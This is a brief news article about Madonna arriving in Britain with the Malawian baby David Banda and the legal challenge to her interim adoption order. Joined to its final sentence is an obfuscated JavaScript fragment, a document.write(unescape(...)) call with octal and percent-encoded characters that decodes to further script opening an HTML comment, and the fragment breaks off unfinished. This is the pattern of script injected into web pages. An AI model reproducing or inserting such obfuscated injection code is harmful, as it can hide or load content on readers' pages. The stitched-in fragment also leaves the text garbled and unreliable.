Madonna has returned to Britain with her 13-month old Malawian baby boy Davie.
The pop diva hopes to adopt David Banda, and the pair arrived at around 05.30 this morning on a private plane from the southern African country.
The baby was wrapped in a grey blanket and mother and child were surrounded by airport security personnel and a bodyguard.
Madonna was granted an interim order to adopt the poor farmer's son by a high court in Malawi last Thursday, after spending a week in the poverty-stricken country to assess AIDS projects she had funded.
But the Human Rights Consultative Committee in Malawi is planning to go to court to challenge the interim court order allowing Madonna to adopt the baby.
Under Malawian law, expatriates adopting a child usually have to live in the country for 18 months and are monitored by social workers before they get full adoption rights.
The singer must return to Malawi for the adoption to be finally approved.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
